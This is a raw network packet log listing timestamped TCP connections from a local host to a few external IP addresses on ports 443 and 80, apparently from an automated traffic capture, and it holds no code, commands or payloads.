                                                      Jan 13, 2025 00:47:43.265183926 CET4434975620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.265347958 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.265997887 CET49756443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.266110897 CET4434975620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.266482115 CET49757443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.266531944 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.266838074 CET49756443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.270121098 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.270216942 CET49757443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.270704985 CET49757443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.271006107 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.271037102 CET49757443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.276998997 CET4434975920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.277317047 CET49759443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.277334929 CET4434975920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.277357101 CET4434975520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.277520895 CET49755443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.277534962 CET4434975520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.278723001 CET4434975520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.278816938 CET4434975920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.278893948 CET49759443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.279330015 CET49755443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.279778957 CET4434975520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.279799938 CET49759443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.279897928 CET4434975920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.280163050 CET49755443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.280452967 CET49759443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.280469894 CET4434975920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.282565117 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.283020973 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.283046007 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.284663916 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.284739017 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.285068035 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.285150051 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.285212994 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.298618078 CET4434976020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.298917055 CET49760443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.298949957 CET4434976020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.301798105 CET4434976020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.301873922 CET49760443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.302434921 CET49760443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.302516937 CET4434976020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.302735090 CET49760443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.302745104 CET4434976020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.307322025 CET4434975620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.311333895 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.322427034 CET49757443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.322443962 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.322556973 CET49759443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.323324919 CET4434975520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.328063965 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:43.328120947 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.328145981 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.335077047 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:43.335108042 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:43.335650921 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:43.338443995 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:43.338547945 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:43.338956118 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:43.353744030 CET49760443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.367633104 CET49757443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.367654085 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.383322001 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:43.797748089 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.797818899 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.797911882 CET49757443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.799196959 CET49757443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.799231052 CET4434975720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.799551010 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.799601078 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.799685001 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.800437927 CET4434975620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.800487995 CET4434975620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.800559044 CET49756443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.800584078 CET4434975620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.801608086 CET4434975620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.801794052 CET49756443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.802614927 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.802638054 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.804510117 CET49756443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.804539919 CET4434975620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.806082964 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.806129932 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.806216955 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.806772947 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.806803942 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.818300962 CET4434975920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.818387032 CET4434975920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.818469048 CET49759443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.819680929 CET49759443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.819698095 CET4434975920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.820245028 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.820277929 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.820535898 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.822613955 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.822629929 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.824950933 CET4434975520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.825031042 CET4434975520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.825126886 CET49755443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.825807095 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.825833082 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.825918913 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.825943947 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.826005936 CET49755443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.826014996 CET4434975520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.826366901 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.826433897 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.827547073 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.827589989 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.827766895 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.829705954 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.829732895 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.834034920 CET49758443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.834073067 CET4434975820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.834530115 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.834572077 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.834813118 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.835505009 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.835524082 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.845112085 CET4434976020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.845285892 CET4434976020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.845375061 CET49760443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.857542038 CET49760443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.857580900 CET4434976020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.858576059 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.858593941 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:43.858789921 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.860188961 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:43.860203028 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.080323935 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.080430031 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.080471992 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.080534935 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.080571890 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.080590963 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.080650091 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.081866026 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.081909895 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.081947088 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.081964016 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.081998110 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.082036972 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.082421064 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.082501888 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.082515955 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.082582951 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.082643986 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.093924046 CET49761443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:47:44.093950033 CET44349761154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:47:44.705724001 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.723268032 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.727798939 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.750740051 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.759646893 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.760541916 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.761843920 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.776866913 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.776880026 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.809400082 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.809509993 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.810225010 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.911842108 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.911897898 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.912246943 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.912266016 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.912544966 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.913028002 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.913281918 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.913341045 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.913510084 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.913525105 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.913837910 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.913845062 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.913945913 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.913960934 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.914361000 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.914470911 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.914592981 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.914663076 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.914923906 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.914937973 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.914972067 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.915388107 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.915487051 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.915888071 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.915963888 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.916604042 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.916690111 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.916934967 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.917088985 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.917130947 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.917140007 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.917215109 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.917223930 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.917244911 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.917246103 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.917279959 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.919459105 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.919554949 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.920996904 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.921176910 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.921724081 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.921830893 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.921938896 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.921967030 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.922209024 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.922218084 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.962008953 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.962095976 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.962116003 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.962143898 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:44.963325024 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:44.963336945 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.247086048 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.247174978 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.247262955 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.252206087 CET49764443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.252252102 CET4434976420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.252785921 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.252827883 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.252882957 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.254627943 CET49772443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.254647017 CET4434977220.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.263866901 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.263974905 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.264025927 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.267450094 CET49763443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.267466068 CET4434976320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.267740011 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.267767906 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.267822027 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.267887115 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.268274069 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.268384933 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.268543959 CET49773443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.268625975 CET4434977320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.268697977 CET49773443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.271109104 CET49773443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.271143913 CET4434977320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.274266958 CET49765443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.274296045 CET4434976520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.277504921 CET49774443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.277522087 CET4434977420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.277579069 CET49774443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.278865099 CET49774443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.278879881 CET4434977420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.298583031 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.298651934 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.298718929 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.298783064 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.298815966 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.298836946 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.298856020 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.298890114 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.299024105 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.299067974 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.299067974 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.299087048 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.299149036 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.299158096 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.300409079 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.300457001 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.303913116 CET49766443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.303944111 CET4434976620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.304950953 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.304969072 CET49775443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.304996967 CET4434977520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.305011988 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.305058002 CET49775443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.305075884 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.305102110 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.305147886 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.305319071 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.305337906 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.305376053 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.305459023 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.305512905 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.305526972 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.305577993 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.312086105 CET49775443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.312113047 CET4434977520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.313086033 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.313086033 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.313097954 CET4434976820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.313190937 CET49768443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.313688993 CET49776443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.313720942 CET4434977620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.313772917 CET49776443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.314805984 CET49776443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.314819098 CET4434977620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.528417110 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.528538942 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.528541088 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.528578997 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.528601885 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.528619051 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.529568911 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.529634953 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.529844046 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.529898882 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.530060053 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.530114889 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.530672073 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.530726910 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.531207085 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.531270027 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.572161913 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.572232008 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.750152111 CET8049723217.20.57.34192.168.2.4
                                                      Jan 13, 2025 00:47:45.750403881 CET4972380192.168.2.4217.20.57.34
                                                      Jan 13, 2025 00:47:45.752911091 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.753004074 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.753046036 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.753074884 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.753118038 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.753118038 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.753169060 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.753277063 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.753712893 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.753787041 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.753904104 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.753963947 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.754019022 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.754080057 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.754578114 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.754647970 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.754993916 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.755050898 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.755079985 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.755141973 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.755515099 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.755578041 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.755606890 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.755665064 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.756496906 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.756552935 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.868637085 CET4972380192.168.2.4217.20.57.34
                                                      Jan 13, 2025 00:47:45.869838953 CET49767443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.869875908 CET4434976720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.870965004 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.870994091 CET4434977720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:47:45.871078968 CET49777443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:47:45.872745991 CET49777443192.168.2.420.255.122.93
